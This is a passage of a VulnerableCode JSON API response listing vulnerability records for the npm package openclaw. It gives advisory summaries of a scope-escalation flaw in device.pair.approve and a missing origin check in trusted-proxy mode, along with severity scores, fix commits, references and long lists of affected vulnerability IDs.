                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "GHSA-36cp-mh65-x882"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-eaaf-8rfa-f3hz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91021?format=api",
            "vulnerability_id": "VCID-eda1-pnhb-bqes",
            "summary": "OpenClaw Gateway: RCE and Privilege Escalation from operator.pairing to operator.admin via device.pair.approve\n## Summary\ndevice.pair.approve allowed an operator.pairing approver to approve a pending device request for broader operator scopes than the approver actually held. Per the title, the scopes granted this way could reach operator.admin although the approver held only operator.pairing.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `fc2d29ea926f47c428c556e92ec981441228d2a4`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`. Note that 2026.3.22 resolves this issue only: the `fixed_packages` data in this record flags `pkg:npm/openclaw@2026.3.22` as `is_vulnerable: true` for other advisories.\n\n## Code-Level Confirmation\n- src/gateway/server-methods/devices.ts now threads caller scopes into device.pair.approve.\n- src/infra/device-pairing.ts now rejects requested operator scopes that exceed the approver-held operator scope set.\n\nOpenClaw thanks @zpbrent for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35639",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00309",
                            "scoring_system": "epss",
                            "scoring_elements": "0.54421",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00309",
                            "scoring_system": "epss",
                            "scoring_elements": "0.54431",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00309",
                            "scoring_system": "epss",
                            "scoring_elements": "0.5442",
                            "published_at": "2026-06-07T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35639"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T03:10:46Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T03:10:46Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T03:10:46Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35639",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35639"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "8.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T03:10:46Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-hf68-49fm-59cq",
                    "reference_id": "GHSA-hf68-49fm-59cq",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-hf68-49fm-59cq"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
                            "vulnerability": "VCID-384t-z1h8-pfft"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3bdd-a9nw-13bn"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4jwj-6s5z-wbeq"
                        },
                        {
                            "vulnerability": "VCID-4nwq-14y4-xkhp"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4uqc-3h1c-4yhs"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5atj-2a7b-57g5"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6849-th74-yqd5"
                        },
                        {
                            "vulnerability": "VCID-6bxd-kbse-sudx"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-8uzb-xmf8-hbca"
                        },
                        {
                            "vulnerability": "VCID-8z7r-a8dv-eueb"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9jjv-aa8k-rke1"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9pj9-7b12-jbea"
                        },
                        {
                            "vulnerability": "VCID-9uyu-y9qv-u7e1"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-9yxw-fj1c-tff9"
                        },
                        {
                            "vulnerability": "VCID-a2p8-ydn6-3bbr"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-atn7-pn13-3fgb"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-aye6-1fwu-nkc5"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bg1d-gmxy-wkc6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bk76-1ctt-tkaw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-bnfh-rsk9-cfea"
                        },
                        {
                            "vulnerability": "VCID-brfj-4shr-qkgc"
                        },
                        {
                            "vulnerability": "VCID-bumq-54sb-6ua7"
                        },
                        {
                            "vulnerability": "VCID-bzw7-yvu2-yqa2"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-csnc-r6fv-j3en"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-cvxu-rdbu-abd2"
                        },
                        {
                            "vulnerability": "VCID-cwd3-ecym-sfaw"
                        },
                        {
                            "vulnerability": "VCID-d3qp-5wm9-aqfp"
                        },
                        {
                            "vulnerability": "VCID-d864-qy75-c3dx"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dbcw-brhj-k7hs"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-djqx-bwuu-4uc1"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-gvam-2net-8kc5"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hkqd-6khg-m3hj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-j92n-5217-9bhj"
                        },
                        {
                            "vulnerability": "VCID-j96c-kau3-7fag"
                        },
                        {
                            "vulnerability": "VCID-jbwa-scg3-efeq"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jhah-j2td-t3dp"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-jtxm-z4vv-cqg7"
                        },
                        {
                            "vulnerability": "VCID-k3up-1vdf-2uh9"
                        },
                        {
                            "vulnerability": "VCID-k52b-966p-ybbk"
                        },
                        {
                            "vulnerability": "VCID-k5da-7tht-w3bs"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mggy-bv5s-5uax"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nfva-pukn-uqch"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pa1f-qzsh-efa9"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pc9z-x5wk-8ue7"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-qjvc-etb4-qbfv"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-r9y1-z2ax-z3e2"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-te8f-snty-j7hh"
                        },
                        {
                            "vulnerability": "VCID-tf28-1z2z-5yfn"
                        },
                        {
                            "vulnerability": "VCID-tk9h-nqrz-uugp"
                        },
                        {
                            "vulnerability": "VCID-u1ru-vdfp-x3hu"
                        },
                        {
                            "vulnerability": "VCID-u6hw-ffpj-4yd9"
                        },
                        {
                            "vulnerability": "VCID-u9cw-crg5-1kbs"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v1bp-hw9a-yffz"
                        },
                        {
                            "vulnerability": "VCID-v91b-1nmx-ckcx"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vm8g-hrvu-quhm"
                        },
                        {
                            "vulnerability": "VCID-vqrj-z6tx-rff2"
                        },
                        {
                            "vulnerability": "VCID-vtqt-bgz7-yub6"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2rd-2j4p-gfgw"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wkye-je9r-1fba"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wut7-y72y-9ucb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xpr3-hg3h-z3bz"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zac2-wjyt-27af"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zf3q-78js-k7ce"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"
                }
            ],
            "aliases": [
                "CVE-2026-35639",
                "GHSA-hf68-49fm-59cq"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-eda1-pnhb-bqes"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89584?format=api",
            "vulnerability_id": "VCID-fekn-d6f3-xfa6",
            "summary": "OpenClaw: HTTP operator endpoints lack browser-origin validation in trusted-proxy mode\n## Summary\nHTTP operator endpoints lack browser-origin validation in trusted-proxy mode\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: This is a real trusted-proxy HTTP CSRF or browser-origin gap in released tags, but it is not critical because it depends on identity-bearing trusted-proxy browser deployments rather than the shared-secret HTTP operator model.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `6b3f99a11f4d070fa5ed2533abbb3d7329ea4f0d` — 2026-03-31T19:49:26+09:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41347",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.047",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04712",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
